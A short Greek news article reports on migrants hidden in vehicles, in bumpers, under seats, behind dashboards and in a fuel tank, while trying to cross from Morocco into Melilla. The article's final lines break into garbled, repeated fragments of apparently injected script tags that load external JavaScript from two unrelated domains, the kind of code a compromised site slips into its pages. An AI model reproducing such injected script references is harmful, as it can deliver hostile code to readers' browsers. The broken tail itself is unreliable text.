Οι απίστευτοι τρόποι περάσματος μεταναστών στην Ευρώπη

2015-09-16-refugees-flickr-josh-zakary

Όταν η απελπισία είναι μεγάλη και η μόνη λύση φαίνεται να είναι η φυγή, τότε οι άνθρωποι φτάνουν στα άκρα για να καταφέρουν να περάσουν εκεί που θεωρούν πως μπορεί να έχουν μια καλύτερη ευκαιρία στη ζωή.

Αυτό αποτυπώνουν και οι φωτογραφίες αυτές με μετανάστες που κρύβονται στα πιο απίθανα σημεία για να περάσουν στην Ισπανία, στο θύλακα της Melilla, από το Μαρόκο.

spanskdman8

Έχουν βρεθεί άνθρωποι δεμένοι μέσα στον προφυλακτήρα, άνθρωποι στριμωγμένοι μέσα στην πλάτη του καθίσματος, εγκλωβισμένοι δίπλα στη μηχανή. Εντοπίζονται, συνήθως με ειδικές συσκευές, πολλές φορές σε πολύ κακή κατάσταση.

spanskdman5

Ο εικονιζόμενος άνδρας μέσα στον προφυλακτήρα είναι ένας 29χρονος από τη Γουινέα. Εντοπίστηκε στο όχημα όταν αισθητήρες κατέγραψαν τον καρδιακό παλμό του.

spanskdman1

Ο άνδρας μεταφέρθηκε εσπευσμένα στο νοσοκομείο καθώς είχε δυσκολία στην αναπνοή.

Λίγο νωρίτερα άλλοι δύο άνθρωποι από τη Γουινέα, ένας 24χρονος κι ένας 13χρονος, βρέθηκαν στριμωγωμένοι σε ειδικά διαμορφωμένο χώρο κάτω από το κάθισμα οχήματος που επιχείρησε να περάσει τα σύνορα.

spanskdman2

Στο παρελθόν έχουν βρεθεί ένα παιδί κρυμμένο μέσα σε βαλίτσα κι ένας άνδρας κρυμμένος πίσω από το ταμπλό αυτοκινήτου.

spanskdman3

spanskdman4

Σε άλλο περιστατικό ένας άνδρας χρειάστηκε να απεγκλωβιστεί μέσα από το ντεπόζιτο οχήματος.

spanskdman6spanskdman7___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >